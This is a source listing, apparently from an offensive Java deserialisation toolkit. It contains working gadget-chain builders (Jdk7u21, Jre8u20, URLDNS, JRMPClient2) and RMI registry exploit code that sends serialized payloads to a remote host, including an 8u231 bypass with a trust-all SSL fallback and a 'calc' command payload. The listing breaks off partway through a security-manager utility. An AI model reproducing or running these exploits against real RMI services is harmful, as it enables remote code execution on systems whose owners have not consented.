-------------------------------------------------------------------------------- /src/main/java/com/achuna33/Gadgets/JRMPClient2.java: --------------------------------------------------------------------------------
package com.achuna33.Gadgets;

import sun.rmi.server.UnicastRef;
import sun.rmi.transport.LiveRef;
import sun.rmi.transport.tcp.TCPEndpoint;

import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.Proxy;
import java.rmi.server.ObjID;
import java.rmi.server.RMIServerSocketFactory;
import java.rmi.server.RemoteObjectInvocationHandler;
import java.rmi.server.UnicastRemoteObject;
import java.util.Random;

/**
 * Variant of {@code JRMPClient} for registries patched in 8u231: instead of a bare {@link java.rmi.registry.Registry}
 * proxy, the remote reference is hidden inside a {@link UnicastRemoteObject} whose private {@code ssf}
 * (server socket factory) field is set by reflection to a proxy backed by the {@code RemoteObjectInvocationHandler}.
 * The numbered comments in {@code getObject} and the two links below describe the construction; the
 * defender notes on {@code JRMPClient} apply unchanged (outbound JRMP connection on deserialisation;
 * {@code ObjectInputFilter} / network isolation of RMI as mitigation). Relies on {@code sun.rmi.*} internals
 * and on reflective access to JDK-internal fields, which newer JDKs restrict.
 */
@SuppressWarnings ( {
    "restriction"
} )
public class JRMPClient2 {

    //https://github.com/hex0wn/learn-java-bug/blob/2861e0a7f3769dc1383b12c2650ffd314c6d3ad2/rmi/src/main/java/org/example/EvilBind.java
    // payload that bypasses the 8u231 fix.
    // https://mogwailabs.de/blog/2020/02/an-trinhs-rmi-registry-bypass/
    /**
     * @param command {@code host} or {@code host:port}; without a port a random value from
     *                {@code Random.nextInt(65535)} (0..65534) is used
     * @return the armed {@link UnicastRemoteObject}
     * @throws Exception propagated from reflection; a non-numeric port raises {@link NumberFormatException}
     */
    public UnicastRemoteObject getObject(String command) throws Exception {

        String host;
        int port;
        int sep = command.indexOf(':');
        if ( sep < 0 ) {
            port = new Random().nextInt(65535);
            host = command;
        }
        else {
            host = command.substring(0, sep);
            port = Integer.valueOf(command.substring(sep + 1));
        }

        // 1. Create a new TCPEndpoint and UnicastRef instance.
        // The TCPEndpoint contains the IP/port of the attacker
        // Taken from Moritz Bechlers JRMP Client
        ObjID id = new ObjID(new Random().nextInt()); // RMI registry

        TCPEndpoint te = new TCPEndpoint(host, port);
        UnicastRef refObject = new UnicastRef(new LiveRef(id, te, false));

        // 2. Create a new instance of RemoteObjectInvocationHandler,
        // passing the RemoteRef object (refObject) with the attacker controlled IP/port in the constructor
        RemoteObjectInvocationHandler myInvocationHandler = new RemoteObjectInvocationHandler(refObject);

        // 3. Create a dynamic proxy class that implements the classes/interfaces RMIServerSocketFactory
        // and Remote and passes all incoming calls to the invoke method of the
        // RemoteObjectInvocationHandler
        RMIServerSocketFactory handcraftedSSF = (RMIServerSocketFactory) Proxy.newProxyInstance(
                RMIServerSocketFactory.class.getClassLoader(),
                new Class[] { RMIServerSocketFactory.class, java.rmi.Remote.class },
                myInvocationHandler);

        // 4. Create a new UnicastRemoteObject instance by using Reflection
        // Make the constructor public
        // (null is passed as the varargs array for the no-arg constructor; an empty array would be the unambiguous form)
        Constructor constructor = UnicastRemoteObject.class.getDeclaredConstructor(null);
        constructor.setAccessible(true);
        UnicastRemoteObject myRemoteObject = (UnicastRemoteObject) constructor.newInstance(null);

        // 5. Make the ssf instance accessible (again by using Reflection) and set it to the proxy object
        Field privateSsfField = UnicastRemoteObject.class.getDeclaredField("ssf");
        privateSsfField.setAccessible(true);

        // 6. Set the ssf instance of the UnicastRemoteObject to our proxy
        privateSsfField.set(myRemoteObject, handcraftedSSF);

        // return the gadget
        return myRemoteObject;
    }
    /** Only sets the context class loader; the runner call is commented out. */
    public static void main ( final String[] args) throws Exception {
        Thread.currentThread().setContextClassLoader(JRMPClient2.class.getClassLoader());
        //PayloadRunner.run(JRMPClient2.class, new String[]{"127.0.0.1:1099"} );
    }
}
-------------------------------------------------------------------------------- /src/main/java/com/achuna33/Gadgets/JRMPClientExploit.java: --------------------------------------------------------------------------------
package com.achuna33.Gadgets;


import java.io.DataOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.io.OutputStream;
import java.net.InetSocketAddress;
import java.net.Socket;
import java.net.SocketException;
import java.net.URL;
import java.net.URLClassLoader;
import java.net.UnknownHostException;

import javax.net.SocketFactory;

import sun.rmi.transport.TransportConstants;



/**
 * Hand-rolled JRMP client: {@code makeDGCCall} opens a TCP socket, writes the JRMP stream header from
 * {@code TransportConstants} and a single DGC call whose argument is an arbitrary serialised object, which the
 * receiving RMI endpoint deserialises.
 * Defender notes: this is exactly what the JEP 290 DGC filter and {@code sun.rmi.transport.dgcFilter} exist
 * to stop on the server side; keep RMI/DGC ports off untrusted networks and filter deserialisation.
 * {@code main} is fully commented out (the original usage string has lost its angle-bracket placeholders in
 * this listing).
 */
public class JRMPClientExploit {

    public static final void main ( final String[] args ) {
        // if ( args.length < 4 ) {
        // System.err.println(JRMPClientExploit.class.getName() + " ");
        // System.exit(-1);
        // }
        //
        // Object payloadObject = Utils.makePayloadObject(args[2], args[3]);
        // String hostname = args[ 0 ];
        // int port = Integer.parseInt(args[ 1 ]);
        // try {
        // System.err.println(String.format("* Opening JRMP socket %s:%d", hostname, port));
        // makeDGCCall(hostname, port, payloadObject);
        // }
        // catch ( Exception e ) {
        // e.printStackTrace(System.err);
        // }
        // Utils.releasePayload(args[2], payloadObject);
    }

    /**
     * Sends one JRMP single-op call carrying {@code payloadObject} to {@code hostname:port}.
     *
     * @param hostname      remote host
     * @param port          remote port
     * @param payloadObject object written as the call's argument
     * @throws IOException on any socket or stream failure (the socket and data stream are closed in {@code finally})
     */
    public static void makeDGCCall ( String hostname, int port, Object payloadObject ) throws IOException,
UnknownHostException, SocketException {
        InetSocketAddress isa = new InetSocketAddress(hostname, port);   // NOTE(review): unused — the socket is created from hostname/port directly
        Socket s = null;
        DataOutputStream dos = null;
        try {
            s = SocketFactory.getDefault().createSocket(hostname, port);
            s.setKeepAlive(true);
            s.setTcpNoDelay(true);

            OutputStream os = s.getOutputStream();
            dos = new DataOutputStream(os);

            // JRMP stream header
            dos.writeInt(TransportConstants.Magic);
            dos.writeShort(TransportConstants.Version);
            dos.writeByte(TransportConstants.SingleOpProtocol);

            dos.write(TransportConstants.Call);

            // NOTE(review): objOut is neither flushed nor closed; the code relies on ObjectOutputStream draining
            // its block-data buffer around writeObject and on os.flush() below — verify nothing stays buffered
            @SuppressWarnings ( "resource" )
            final ObjectOutputStream objOut = new MarshalOutputStream(dos);

            objOut.writeLong(2); // DGC
            objOut.writeInt(0);
            objOut.writeLong(0);
            objOut.writeShort(0);

            objOut.writeInt(1); // dirty
            objOut.writeLong(-669196253586618813L);   // presumably the DGC interface hash for the "dirty" call above — TODO confirm

            objOut.writeObject(payloadObject);

            os.flush();
        }
        finally {
            if ( dos != null ) {
                dos.close();
            }
            if ( s != null ) {
                s.close();
            }
        }
    }

    /**
     * {@link ObjectOutputStream} that writes an RMI class annotation (codebase string) for every class:
     * {@code sendUrl} when one was given, otherwise the URLs of the class's {@link URLClassLoader}, otherwise
     * {@code null}. Note that the no-URL path leaks this JVM's own class-path URLs to the remote peer.
     */
    static final class MarshalOutputStream extends ObjectOutputStream {


        private URL sendUrl;   // codebase to announce; null means "derive from the class loader"

        public MarshalOutputStream (OutputStream out, URL u) throws IOException {
            super(out);
            this.sendUrl = u;
        }

        MarshalOutputStream ( OutputStream out ) throws IOException {
            super(out);
        }

        /**
         * Writes the codebase annotation for {@code cl}. A bootstrap class has a {@code null} loader, which fails
         * the {@code instanceof} test and therefore also annotates {@code null}.
         */
        @Override
        protected void annotateClass ( Class cl ) throws IOException {
            if ( this.sendUrl != null ) {
                writeObject(this.sendUrl.toString());
            } else if ( ! ( cl.getClassLoader() instanceof URLClassLoader ) ) {
                writeObject(null);
            }
            else {
                URL[] us = ( (URLClassLoader) cl.getClassLoader() ).getURLs();
                String cb = "";

                // URLs are concatenated with no separator (string building in a loop; fine for a handful of URLs)
                for ( URL u : us ) {
                    cb += u.toString();
                }
                writeObject(cb);
            }
        }


        /**
         * Serializes a location from which to load the specified class.
         */
        @Override
        protected void annotateProxyClass ( Class cl ) throws IOException {
            annotateClass(cl);
        }
    }


}
-------------------------------------------------------------------------------- /src/main/java/com/achuna33/Gadgets/Jdk7u21.java: --------------------------------------------------------------------------------
package com.achuna33.Gadgets;



import com.achuna33.Gadgets.utils.Gadgets;
import com.achuna33.Gadgets.utils.Reflections;
import com.achuna33.SupportType.PayloadType;

import javax.xml.transform.Templates;
import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.InvocationHandler;
import java.util.HashMap;
import java.util.LinkedHashSet;

/**
 * Builds the JDK-only "Jdk7u21" deserialisation gadget (no third-party library needed): a
 * {@link LinkedHashSet} holding a TemplatesImpl and a {@link Templates} proxy backed by
 * {@code AnnotationInvocationHandler}, arranged so that the set's equality check on deserialisation
 * reaches the TemplatesImpl. Patched in JDK 7u21 / 6u45; an {@code ObjectInputFilter} is the mitigation
 * on older runtimes.
 */
public class Jdk7u21 {

    /**
     * Builds the gadget object graph.
     *
     * @param type  payload type forwarded to {@code Gadgets.createTemplatesImpl}
     * @param param payload parameters forwarded to {@code Gadgets.createTemplatesImpl}
     * @return the armed {@link LinkedHashSet}
     * @throws Exception propagated from reflection and the templates builder
     */
    public static Object getObject(PayloadType type, String...
param) throws Exception{
        final Object templates = Gadgets.createTemplatesImpl(type, param);

        String zeroHashCodeStr = "f5a5a608";   // a String whose hashCode() is 0, as the name says

        HashMap map = new HashMap();
        map.put(zeroHashCodeStr, "foo");   // placeholder value; replaced by the real TemplatesImpl below

        InvocationHandler tempHandler = (InvocationHandler) Reflections.getFirstCtor(Gadgets.ANN_INV_HANDLER_CLASS).newInstance(Override.class, map);
        Reflections.setFieldValue(tempHandler, "type", Templates.class);
        Templates proxy = Gadgets.createProxy(tempHandler, Templates.class);

        LinkedHashSet set = new LinkedHashSet(); // maintain order
        set.add(templates);
        set.add(proxy);

        // transient-like state that must not be serialised with the TemplatesImpl
        Reflections.setFieldValue(templates, "_auxClasses", null);
        Reflections.setFieldValue(templates, "_class", null);

        map.put(zeroHashCodeStr, templates); // swap in real object
        return set;
    }
    /**
     * Serialises the object built by {@code getObject} into a byte array.
     *
     * @param type  payload type forwarded to {@code getObject}
     * @param param payload parameters forwarded to {@code getObject}
     * @return the Java-serialised gadget
     * @throws Exception propagated from {@code getObject} / the serialisation
     */
    public static byte[] getBytes(PayloadType type, String... param) throws Exception {
        Object set = getObject(type,param);
        // serialise
        ByteArrayOutputStream baous = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baous);
        oos.writeObject(set);
        byte[] bytes = baous.toByteArray();
        oos.close();

        return bytes;
    }
}
-------------------------------------------------------------------------------- /src/main/java/com/achuna33/Gadgets/Jre8u20.java: --------------------------------------------------------------------------------
package com.achuna33.Gadgets;


import com.achuna33.Gadgets.utils.Gadgets;
import com.achuna33.Gadgets.utils.Reflections;
import com.achuna33.Gadgets.utils.Util;
import com.achuna33.SupportType.PayloadType;

import javax.xml.transform.Templates;
import java.beans.beancontext.BeanContextSupport;
import java.io.*;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
import java.util.HashMap;
import java.util.LinkedHashSet;

/**
 * Builds the "Jre8u20" gadget, the Jdk7u21 chain re-enabled on 7u21..8u20 by smuggling the
 * {@code AnnotationInvocationHandler} in as {@link BeanContextSupport} block data. Unlike the other gadget
 * classes there is no {@code getObject}: the graph is serialised in pieces and the resulting byte stream is
 * then patched by hand (fixed offset {@code bytes[89]} plus three pattern searches), so the output is tied to
 * the exact serialisation layout of the JDK that produced it.
 * NOTE(review): {@code main} writes {@code 888.ser} and immediately reads it back with a plain
 * {@link ObjectInputStream} — running it executes the payload ("calc") in the local JVM.
 */
public class Jre8u20 {
    /** Writes a command payload to {@code 888.ser} and deserialises it again (executes the payload locally). */
    public static void main(String[] args) throws Exception {
        byte[] bytes = getBytes(PayloadType.command, "calc");
        FileOutputStream fous = new FileOutputStream("888.ser");
        fous.write(bytes);
        fous.close();
        FileInputStream file = new FileInputStream("888.ser");
        ObjectInputStream obj = new ObjectInputStream(file);   // never closed
        obj.readObject();
    }

    /**
     * Serialises the gadget pieces and patches the stream (see class comment).
     *
     * @param type  payload type forwarded to {@code Gadgets.createTemplatesImpl}
     * @param param payload parameters forwarded to {@code Gadgets.createTemplatesImpl}
     * @return the patched Java-serialised gadget
     * @throws Exception propagated from reflection and the serialisation; the pattern loops below can also
     *                   throw {@link ArrayIndexOutOfBoundsException} (see note there)
     */
    public static byte[] getBytes(PayloadType type, String... param) throws Exception {
        final Object templates = Gadgets.createTemplatesImpl(type, param);
        String zeroHashCodeStr = "f5a5a608";   // a String whose hashCode() is 0, as the name says

        HashMap map = new HashMap();
        map.put(zeroHashCodeStr, "foo");

        InvocationHandler handler = (InvocationHandler) Reflections.getFirstCtor(Gadgets.ANN_INV_HANDLER_CLASS).newInstance(Override.class, map);
        Reflections.setFieldValue(handler, "type", Templates.class);
        Templates proxy = Gadgets.createProxy(handler, Templates.class);
        Reflections.setFieldValue(templates, "_auxClasses", null);
        Reflections.setFieldValue(templates, "_class", null);

        map.put(zeroHashCodeStr, templates); // swap in real object

        LinkedHashSet set = new LinkedHashSet();

        // BeanContextSupport with serializable=0 and itself as its own child peer; the int field is set
        // reflectively and its value is patched to 1 in the byte stream further down
        BeanContextSupport bcs = new BeanContextSupport();
        Class cc = Class.forName("java.beans.beancontext.BeanContextSupport");
        Field serializable = cc.getDeclaredField("serializable");
        serializable.setAccessible(true);
        serializable.set(bcs, 0);

        Field beanContextChildPeer = cc.getSuperclass().getDeclaredField("beanContextChildPeer");
        beanContextChildPeer.set(bcs, bcs);

        set.add(bcs);

        // serialise
        ByteArrayOutputStream baous = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baous);

        // the pieces are written as separate top-level objects; the byte patching below re-threads them
        oos.writeObject(set);
        oos.writeObject(handler);
        oos.writeObject(templates);
        oos.writeObject(proxy);
        oos.close();

        byte[] bytes = baous.toByteArray();
        bytes[89] = 3;   // patch the HashSet length (element count) — fixed offset, assumes the exact stream layout

        // move the TC_ENDBLOCKDATA marker
        //0x73 = 115, 0x78 = 120
        //0x73 for TC_OBJECT, 0x78 for TC_ENDBLOCKDATA
        // NOTE(review): these loops read up to bytes[i+7] while i runs to bytes.length-1, so an unmatched
        // pattern ends in ArrayIndexOutOfBoundsException instead of a clean "not found"
        for(int i = 0; i < bytes.length; i++){
            if(bytes[i] == 0 && bytes[i+1] == 0 && bytes[i+2] == 0 & bytes[i+3] == 0 &&   // '&' here is non-short-circuit; same result as '&&'
                    bytes[i+4] == 120 && bytes[i+5] == 120 && bytes[i+6] == 115){
                bytes = Util.deleteAt(bytes, i + 5);
                break;
            }
        }


        // change the value of serializable to 1
        //0x73 = 115, 0x78 = 120
        //0x73 for TC_OBJECT, 0x78 for TC_ENDBLOCKDATA
        for(int i = 0; i < bytes.length; i++){
            if(bytes[i] == 120 && bytes[i+1] == 0 && bytes[i+2] == 1 && bytes[i+3] == 0 &&
                    bytes[i+4] == 0 && bytes[i+5] == 0 && bytes[i+6] == 0 && bytes[i+7] == 115){
                bytes[i+6] = 1;
                break;
            }
        }

        /**
         TC_BLOCKDATA - 0x77
         Length - 4 - 0x04
         Contents - 0x00000000
         TC_ENDBLOCKDATA - 0x78
         **/

        // delete this section first, then append it after the AnnotationInvocationHandler
        // goal: make the AnnotationInvocationHandler become part of the BeanContextSupport's data stream
        //0x77 = 119, 0x78 = 120
        //0x77 for TC_BLOCKDATA, 0x78 for TC_ENDBLOCKDATA
        for(int i = 0; i < bytes.length; i++){
            if(bytes[i] == 119 && bytes[i+1] == 4 && bytes[i+2] == 0 && bytes[i+3] == 0 &&
                    bytes[i+4] == 0 && bytes[i+5] == 0 && bytes[i+6] == 120){
                // seven single-byte deletions at the same index remove the 7-byte block-data record
                bytes = Util.deleteAt(bytes, i);
                bytes = Util.deleteAt(bytes, i);
                bytes = Util.deleteAt(bytes, i);
                bytes = Util.deleteAt(bytes, i);
                bytes = Util.deleteAt(bytes, i);
                bytes = Util.deleteAt(bytes, i);
                bytes = Util.deleteAt(bytes, i);
                break;
            }
        }

        /*
         serialVersionUID - 0x00 00 00 00 00 00 00 00
         newHandle 0x00 7e 00 28
         classDescFlags - 0x00 -
         fieldCount - 0 - 0x00 00
         classAnnotations
         TC_ENDBLOCKDATA - 0x78
         superClassDesc
         TC_NULL - 0x70
         newHandle 0x00 7e 00 29
         */
        //0x78 = 120, 0x70 = 112
        //0x78 for TC_ENDBLOCKDATA, 0x70 for TC_NULL
        // NOTE(review): the listing ends here, mid-statement; the rest of getBytes is not visible
        for(int
i = 0; i < bytes.length; i++){ 131 | if(bytes[i] == 0 && bytes[i+1] == 0 && bytes[i+2] == 0 && bytes[i+3] == 0 && 132 | bytes[i + 4] == 0 && bytes[i+5] == 0 && bytes[i+6] == 0 && bytes[i+7] == 0 && 133 | bytes[i+8] == 0 && bytes[i+9] == 0 && bytes[i+10] == 0 && bytes[i+11] == 120 && 134 | bytes[i+12] == 112){ 135 | i = i + 13; 136 | bytes = Util.addAtIndex(bytes, i++, (byte) 0x77); 137 | bytes = Util.addAtIndex(bytes, i++, (byte) 0x04); 138 | bytes = Util.addAtIndex(bytes, i++, (byte) 0x00); 139 | bytes = Util.addAtIndex(bytes, i++, (byte) 0x00); 140 | bytes = Util.addAtIndex(bytes, i++, (byte) 0x00); 141 | bytes = Util.addAtIndex(bytes, i++, (byte) 0x00); 142 | bytes = Util.addAtIndex(bytes, i++, (byte) 0x78); 143 | break; 144 | } 145 | } 146 | 147 | //将 sun.reflect.annotation.AnnotationInvocationHandler 的 classDescFlags 由 SC_SERIALIZABLE 修改为 SC_SERIALIZABLE | SC_WRITE_METHOD 148 | //这一步其实不是通过理论推算出来的,是通过debug 以及查看 pwntester的 poc 发现需要这么改 149 | //原因是如果不设置 SC_WRITE_METHOD 标志的话 defaultDataEnd = true,导致 BeanContextSupport -> deserialize(ois, bcmListeners = new ArrayList(1)) 150 | // -> count = ois.readInt(); 报错,无法完成整个反序列化流程 151 | // 没有 SC_WRITE_METHOD 标记,认为这个反序列流到此就结束了 152 | // 标记: 7375 6e2e 7265 666c 6563 --> sun.reflect... 
153 | for(int i = 0; i < bytes.length; i++){ 154 | if(bytes[i] == 115 && bytes[i+1] == 117 && bytes[i+2] == 110 && bytes[i+3] == 46 && 155 | bytes[i + 4] == 114 && bytes[i+5] == 101 && bytes[i+6] == 102 && bytes[i+7] == 108 ){ 156 | i = i + 58; 157 | bytes[i] = 3; 158 | break; 159 | } 160 | } 161 | 162 | //加回之前删除的 TC_BLOCKDATA,表明 HashSet 到此结束 163 | bytes = Util.addAtLast(bytes, (byte) 0x78); 164 | 165 | return bytes; 166 | } 167 | } 168 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Gadgets/RMIRegistryExploitJdk8u231.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Gadgets; 2 | import com.achuna33.Gadgets.utils.ExecCheckingSecurityManager; 3 | import com.achuna33.Gadgets.utils.Reflections; 4 | import sun.rmi.transport.StreamRemoteCall; 5 | 6 | 7 | import javax.net.ssl.SSLContext; 8 | import javax.net.ssl.SSLSocketFactory; 9 | import javax.net.ssl.TrustManager; 10 | import javax.net.ssl.X509TrustManager; 11 | import java.io.IOException; 12 | import java.io.ObjectOutput; 13 | import java.net.Socket; 14 | import java.rmi.*; 15 | import java.rmi.registry.LocateRegistry; 16 | import java.rmi.registry.Registry; 17 | import java.rmi.server.Operation; 18 | import java.rmi.server.RMIClientSocketFactory; 19 | import java.rmi.server.RemoteRef; 20 | import java.security.cert.X509Certificate; 21 | import java.util.concurrent.Callable; 22 | 23 | 24 | @SuppressWarnings({"rawtypes", "unchecked"}) 25 | public class RMIRegistryExploitJdk8u231 { 26 | private static class TrustAllSSL implements X509TrustManager { 27 | private static final X509Certificate[] ANY_CA = {}; 28 | public X509Certificate[] getAcceptedIssuers() { return ANY_CA; } 29 | public void checkServerTrusted(final X509Certificate[] c, final String t) { /* Do nothing/accept all */ } 30 | public void checkClientTrusted(final X509Certificate[] c, final String t) { /* Do nothing/accept all */ } 31 | 
} 32 | 33 | private static class RMISSLClientSocketFactory implements RMIClientSocketFactory { 34 | public Socket createSocket(String host, int port) throws IOException { 35 | try { 36 | SSLContext ctx = SSLContext.getInstance("TLS"); 37 | ctx.init(null, new TrustManager[] {new TrustAllSSL()}, null); 38 | SSLSocketFactory factory = ctx.getSocketFactory(); 39 | return factory.createSocket(host, port); 40 | } catch(Exception e) { 41 | throw new IOException(e); 42 | } 43 | } 44 | } 45 | 46 | public static void main(final String[] args) throws Exception { 47 | if ( args.length < 3 ) { 48 | 49 | System.exit(-1); 50 | return; 51 | } 52 | final String host = args[0]; 53 | final int port = Integer.parseInt(args[1]); 54 | final String gadget = "JRMPClient2"; 55 | final String command = args[2]; 56 | 57 | 58 | Registry registry = LocateRegistry.getRegistry(host, port); 59 | final String className = RMIRegistryExploitJdk8u231.class.getPackage().getName() + "." + gadget; 60 | System.out.println(className); 61 | final Class payloadClass = (Class) Class.forName(className); 62 | 63 | // test RMI registry connection and upgrade to SSL connection on fail 64 | try { 65 | registry.list(); 66 | } catch(ConnectIOException ex) { 67 | registry = LocateRegistry.getRegistry(host, port, new RMISSLClientSocketFactory()); 68 | } 69 | 70 | // ensure payload doesn't detonate during construction or deserialization 71 | exploit(registry, payloadClass, command); 72 | System.exit(0);//不知为何,不加这个语句,程序不会主动退出。 73 | } 74 | 75 | public static void exploit(final Registry registry, 76 | final Class payloadClass, 77 | final String command) throws Exception { 78 | new ExecCheckingSecurityManager().callWrapped(new Callable(){public Void call() throws Exception { 79 | 80 | Object payload =new JRMPClient2().getObject(command); 81 | String name = "pwned" + System.nanoTime(); 82 | // String name = "pwned"; 83 | //Remote remote = Gadgets.createMemoitizedProxy(Gadgets.createMap(name, payload), Remote.class); 84 | 
Remote remote = (Remote) payload;//直接使用JRMPClient2生成的对象,不要包装map了 85 | try { 86 | // registry.bind(name,remote); 87 | // bind(registry,name,remote);//经过改造的bind,但是依然受远程IP限制,还是需要使用lookup 88 | lookup(registry,remote); 89 | } catch (Throwable e) { 90 | e.printStackTrace(); 91 | } 92 | //Utils.releasePayload(payloadObj, payload); 93 | return null; 94 | }}); 95 | } 96 | 97 | /*经过改造的bind函数 98 | 将enableReplace属性改为了false 99 | */ 100 | public static void bind(Registry registry,String var1, Remote var2) throws AccessException, AlreadyBoundException, RemoteException { 101 | try { 102 | Operation[] operations = new Operation[]{new Operation("void bind(java.lang.String, java.rmi.Remote)"), new Operation("java.lang.String list()[]"), new Operation("java.rmi.Remote lookup(java.lang.String)"), new Operation("void rebind(java.lang.String, java.rmi.Remote)"), new Operation("void unbind(java.lang.String)")}; 103 | 104 | RemoteRef ref = (RemoteRef) Reflections.getFieldValue(registry,"ref"); 105 | StreamRemoteCall var3 = (StreamRemoteCall)ref.newCall((java.rmi.server.RemoteObject)registry, operations, 0, 4905912898345647071L); 106 | 107 | try { 108 | ObjectOutput var4 = var3.getOutputStream(); 109 | Reflections.setFieldValue(var4,"enableReplace",false); 110 | var4.writeObject(var1); 111 | var4.writeObject(var2); 112 | } catch (IOException var5) { 113 | throw new MarshalException("error marshalling arguments", var5); 114 | } 115 | 116 | ref.invoke(var3); 117 | ref.done(var3); 118 | } catch (RuntimeException var6) { 119 | throw var6; 120 | } catch (RemoteException var7) { 121 | throw var7; 122 | } catch (AlreadyBoundException var8) { 123 | throw var8; 124 | } catch (Exception var9) { 125 | throw new UnexpectedException("undeclared checked exception", var9); 126 | } 127 | } 128 | 129 | /*经过改造的lookup函数 130 | 将enableReplace属性改为了false 131 | */ 132 | public static void lookup(Registry registry,Remote var1) throws AccessException, AlreadyBoundException, RemoteException { 133 | try { 134 | 
Operation[] operations = new Operation[]{new Operation("void bind(java.lang.String, java.rmi.Remote)"), new Operation("java.lang.String list()[]"), new Operation("java.rmi.Remote lookup(java.lang.String)"), new Operation("void rebind(java.lang.String, java.rmi.Remote)"), new Operation("void unbind(java.lang.String)")}; 135 | 136 | RemoteRef ref = (RemoteRef) Reflections.getFieldValue(registry,"ref"); 137 | StreamRemoteCall var3 = (StreamRemoteCall)ref.newCall((java.rmi.server.RemoteObject)registry, operations, 2, 4905912898345647071L); 138 | 139 | try { 140 | ObjectOutput var4 = var3.getOutputStream(); 141 | Reflections.setFieldValue(var4,"enableReplace",false); 142 | var4.writeObject(var1); 143 | } catch (IOException var5) { 144 | throw new MarshalException("error marshalling arguments", var5); 145 | } 146 | 147 | ref.invoke(var3); 148 | ref.done(var3); 149 | } catch (RuntimeException var6) { 150 | throw var6; 151 | } catch (RemoteException var7) { 152 | throw var7; 153 | } catch (AlreadyBoundException var8) { 154 | throw var8; 155 | } catch (Exception var9) { 156 | throw new UnexpectedException("undeclared checked exception", var9); 157 | } 158 | } 159 | } 160 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Gadgets/URLDNS.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Gadgets; 2 | 3 | 4 | import com.achuna33.Gadgets.utils.Reflections; 5 | 6 | import java.io.ByteArrayOutputStream; 7 | import java.io.IOException; 8 | import java.io.ObjectOutputStream; 9 | import java.net.InetAddress; 10 | import java.net.URL; 11 | import java.net.URLConnection; 12 | import java.net.URLStreamHandler; 13 | import java.util.HashMap; 14 | 15 | public class URLDNS { 16 | 17 | public static Object getObject(final String url) throws Exception{ 18 | //Avoid DNS resolution during payload creation 19 | //Since the field java.net.URL.handler is transient, it will not 
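be part of the serialized payload.
        URLStreamHandler handler = new SilentURLStreamHandler();

        HashMap ht = new HashMap(); // HashMap that will contain the URL
        URL u = new URL(null, url, handler); // URL to use as the Key
        ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.

        Reflections.setFieldValue(u, "hashCode", -1); // During the put above, the URL's hashCode is calculated and cached. This resets that so the next time hashCode is called a DNS lookup will be triggered.
        return ht;
    }
    public static byte[] getBytes(final String url) throws Exception {
        Object ht = getObject(url);

        ByteArrayOutputStream baous = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baous);
        oos.writeObject(ht);
        byte[] bytes = baous.toByteArray();
        oos.close();

        return bytes;
    }


    static class SilentURLStreamHandler extends URLStreamHandler {

        protected URLConnection openConnection(URL u) throws IOException {
            return null;
        }

        protected synchronized InetAddress getHostAddress(URL u) {
            return null;
        }
    }
}
--------------------------------------------------------------------------------
/src/main/java/com/achuna33/Gadgets/utils/ClassFiles.java:
--------------------------------------------------------------------------------
package com.achuna33.Gadgets.utils;

import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;

/**
 * Maps a {@link Class} to its class-file resource name and reads that class file
 * back from the classpath.
 */
public class ClassFiles {
    /**
     * Returns the classpath resource name of {@code clazz}'s class file, including the
     * {@code .class} suffix (e.g. {@code java/util/Map$Entry.class}).
     */
    public static String classAsFile(final Class clazz) {
        return classAsFile(clazz, true);
    }

    /**
     * Returns the classpath resource name of {@code clazz}'s class file.
     *
     * @param clazz  the class to locate
     * @param suffix whether to append {@code .class}
     * @return the resource name, using {@code /} as the package separator
     */
    public static String classAsFile(final Class clazz, boolean suffix) {
        // Class.getName() already is the binary name ("pkg.Outer$Inner", "pkg.Outer$1"),
        // so nested, anonymous and local classes map to the right file directly. The
        // previous getEnclosingClass()/getSimpleName() recursion produced "Outer$" for
        // anonymous classes because getSimpleName() is empty for them.
        String str = clazz.getName().replace('.', '/');
        if (suffix) {
            str += ".class";
        }
        return str;
    }

    /**
     * Reads the bytecode of {@code clazz} through the class loader that loaded this class.
     *
     * @param clazz the class whose class file is read
     * @return the raw class-file bytes
     * @throws RuntimeException wrapping the {@link IOException} when the resource is
     *                          missing or cannot be read
     */
    public static byte[] classAsBytes(final Class clazz) {
        final String file = classAsFile(clazz);
        // try-with-resources: the stream used to be left open on every path
        // (a null resource is legal here; close() is simply skipped).
        try (InputStream in = ClassFiles.class.getClassLoader().getResourceAsStream(file)) {
            if (in == null) {
                throw new IOException("couldn't find '" + file + "'");
            }
            final ByteArrayOutputStream out = new ByteArrayOutputStream();
            final byte[] buffer = new byte[1024];
            int len;
            while ((len = in.read(buffer)) != -1) {
                out.write(buffer, 0, len);
            }
            return out.toByteArray();
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
    }

}
--------------------------------------------------------------------------------
/src/main/java/com/achuna33/Gadgets/utils/ExecCheckingSecurityManager.java:
--------------------------------------------------------------------------------
package com.achuna33.Gadgets.utils;


import java.security.Permission;
import java.util.Collections;
import java.util.LinkedList;
import java.util.List;
import java.util.concurrent.Callable;

// TODO per-thread secmgr
/**
 * {@link SecurityManager} that records every {@code Runtime.exec} attempt made while it is
 * installed and, by default, aborts it with an {@code ExecException}. The caller uses it to
 * make sure a generated payload does not execute locally while it is being built.
 * The manager is installed process-wide, not per thread (see the TODO above).
 */
public class ExecCheckingSecurityManager extends SecurityManager {
    public ExecCheckingSecurityManager() {
        this(true);
    }

    /**
     * @param throwException when {@code true}, an exec attempt raises {@code ExecException}
     *                       instead of only being recorded
     */
    public ExecCheckingSecurityManager(boolean throwException) {
        this.throwException = throwException;
    }

    private final boolean throwException;

    // commands seen by checkExec, in call order (element type restored; the raw List
    // made getCmds().get(0) an Object and broke the ExecException(String) calls)
    private final List<String> cmds = new LinkedList<String>();

    /** @return read-only view of the exec commands observed so far */
    public List<String> getCmds() {
        return Collections.unmodifiableList(cmds);
    }

    // Every other permission is granted; only exec is of interest here.
    @Override
    public void checkPermission(final Permission perm) { }

    @Override
    public void checkPermission(final Permission perm, final Object context) { }

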